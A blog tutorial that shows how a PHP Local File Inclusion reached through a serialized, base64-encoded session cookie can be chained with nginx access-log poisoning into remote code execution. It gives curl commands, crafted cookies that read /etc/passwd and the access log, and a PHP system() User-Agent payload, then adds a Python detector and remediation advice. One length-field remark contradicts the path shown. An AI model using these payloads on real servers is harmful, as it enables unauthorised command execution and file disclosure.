Log Poisoning to Remote Code Execution | LFI | cURL

Medusa, published in System Weakness, Jun 5, 2022


In this article, we will see how to achieve Remote Code Execution through Log Poisoning, a technique that builds on a Local File Inclusion vulnerability.

Let’s say there’s a web application using PHP as its backend language.

Burp Suite could be used for this whole process, but I'm going to use cURL to send requests, manipulate them and read the responses.

screenshot 1

From the screenshot above, we can see from the response headers that the server is Nginx and the backend language is PHP.

Local File Inclusion in PHP

Local File Inclusion is a very common web application vulnerability. It allows attackers to read sensitive files on the server and sometimes even execute commands. It occurs when user input is passed to a file-inclusion function without proper validation.

From screenshot 1 we can see that the web application sets a cookie named PHPSESSID whose value is base64-encoded. Decoding the cookie value reveals a serialized PHP object:

O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

PHP's serialize() function converts a value such as an array or object, whose elements may be of more than one data type, into a formatted string so that it can be stored or transmitted and later rebuilt with unserialize(). For example:

<?php
$data = serialize(array("Cat", "Dogs", "Rabbit"));
echo $data;
?>
The above PHP code outputs: a:3:{i:0;s:3:"Cat";i:1;s:4:"Dogs";i:2;s:6:"Rabbit";}

screenshot 2

The decoded cookie data looks interesting: it points to an index.html path. If we modify that path, the application may include any file present on the server, which would be a Local File Inclusion.

Base64-encode the modified serialized string below and send it to the application as the cookie value.

O:9:"PageModel":1:{s:4:"file";s:22:"../../../../etc/passwd";}
screenshot 3

Command: curl -i -v {URL} -b "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCI7fQ=="

It works! The response contains the contents of the passwd file, which confirms the LFI vulnerability in this application.

Log Poisoning

A server log is a text file that records the activity seen by the web server: the files that were requested, status codes, User-Agent strings, client IP addresses and so on.

Log poisoning (also called log injection) is a technique in which the attacker tampers with the contents of a log file, for example by inserting malicious code into the server logs, in order to execute commands remotely or obtain a reverse shell. It only works when the application is already vulnerable to LFI.

The PHP code passes the file path taken from the cookie (index.html by default) to an include statement without proper input validation, so whatever file is included gets evaluated as PHP. If we can control the contents of a file available on the vulnerable web server, we can place PHP code in it and load the file through the LFI vulnerability to execute our code.

The contents we can control are the log entries that our own requests generate on the server.

In our case, the server is Nginx, so the default path of the access log is /var/log/nginx/access.log; other web servers use different paths. Encoding and sending the string below returns the server's access log.

Note: the length field (s:N:) of the serialized string must match the length of the new path exactly; the author notes to change it to 34 for the particular string used.

O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}
screenshot 4

Remote Code Execution

Since the User-Agent header is written to the log, we are going to set its value to a piece of PHP code and send it to the server.

An RCE vulnerability allows an attacker to execute commands remotely on the victim system.

The PHP function system() below accepts a shell command as its parameter, runs it, and prints the command's output.

<?php system('ls /'); ?>
screenshot 5

Command: curl -i -v {URL} -A "<?php system('ls /'); ?>"

-i include the response headers
-v verbose
-A set the value of the User-Agent header

Once the request is sent, the PHP code is written to the access log, and it will be executed as soon as we include access.log through the LFI.

Command: curl -i -v {URL} -b "PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ=="
screenshot 6

The response lists the directories under the root directory, and in the same way any other command could be executed on the target remotely.
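From the defensive side, both halves of this chain leave traces: the PHPSESSID cookie carries a serialized PageModel whose "file" member points at a log or a traversal path, and the access log itself ends up holding a PHP open tag in the User-Agent field. The following Python script is an added example (not code from the article) that parses nginx combined-format log lines and flags PHP tags in client-controlled fields, and separately decodes a cookie in the article's format to check where its "file" member points. The log lines and cookies in it are constructed for the demonstration.

```python
import base64
import re

# Constructed nginx access-log lines (combined format) for demonstration; not from the article.
SAMPLE_LOG = '''
10.0.0.5 - - [05/Jun/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Jun/2022:10:01:10 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system('ls /'); ?>"
10.0.0.9 - - [05/Jun/2022:10:01:15 +0000] "GET / HTTP/1.1" 200 2048 "-" "curl/7.81.0"
'''
# Constructed PHPSESSID cookies in the article's serialized-PageModel format.
BENIGN_COOKIE = base64.b64encode(b'O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}').decode()
LOG_COOKIE = base64.b64encode(b'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}').decode()

# Combined format: ip ident user [time] "request" status bytes "referer" "user-agent".
# nginx escapes embedded double quotes in logged fields as \x22, so [^"]* is safe here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
PHP_TAG_RE = re.compile(r'<\?(php\b|=)', re.IGNORECASE)  # <?php ... or the short echo tag <?=
SENSITIVE_PREFIXES = ('/etc/', '/var/log/', '/proc/')

def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_poisoning_attempt(line):
    """True when a client-controlled logged field (request, referer, user-agent) carries a PHP tag."""
    e = parse_line(line)
    return e is not None and any(PHP_TAG_RE.search(e[f]) for f in ('req', 'ref', 'ua'))

def scan_log(text):
    """Return the parsed entries of every line that looks like a log-poisoning attempt."""
    return [parse_line(l) for l in text.strip().splitlines() if is_poisoning_attempt(l)]

def cookie_file_target(cookie_value):
    """Decode a base64 PHPSESSID and extract the serialized PageModel 'file' member, or None."""
    try:
        raw = base64.b64decode(cookie_value, validate=True).decode('latin-1')
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    m = re.search(r's:4:"file";s:(\d+):"', raw)
    if not m:
        return None
    length = int(m.group(1))  # honour the declared length so quotes inside the path cannot confuse us
    return raw[m.end():m.end() + length]

def is_suspicious_path(path):
    """Flag traversal sequences or include targets outside web content (logs, /etc, /proc)."""
    norm = path.replace('\\', '/')
    return '../' in norm or norm.startswith(SENSITIVE_PREFIXES) or norm.endswith('.log')
```

The root cause remains the unserialize() of attacker-supplied cookie data fed into include, so the durable fix is to stop deserializing untrusted input and to restrict includes to an allowlist of page files; the checks above are for detection and for blocking obvious attempts at the edge.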

Thank You for Reading.

Twitter: @medusa_0xf
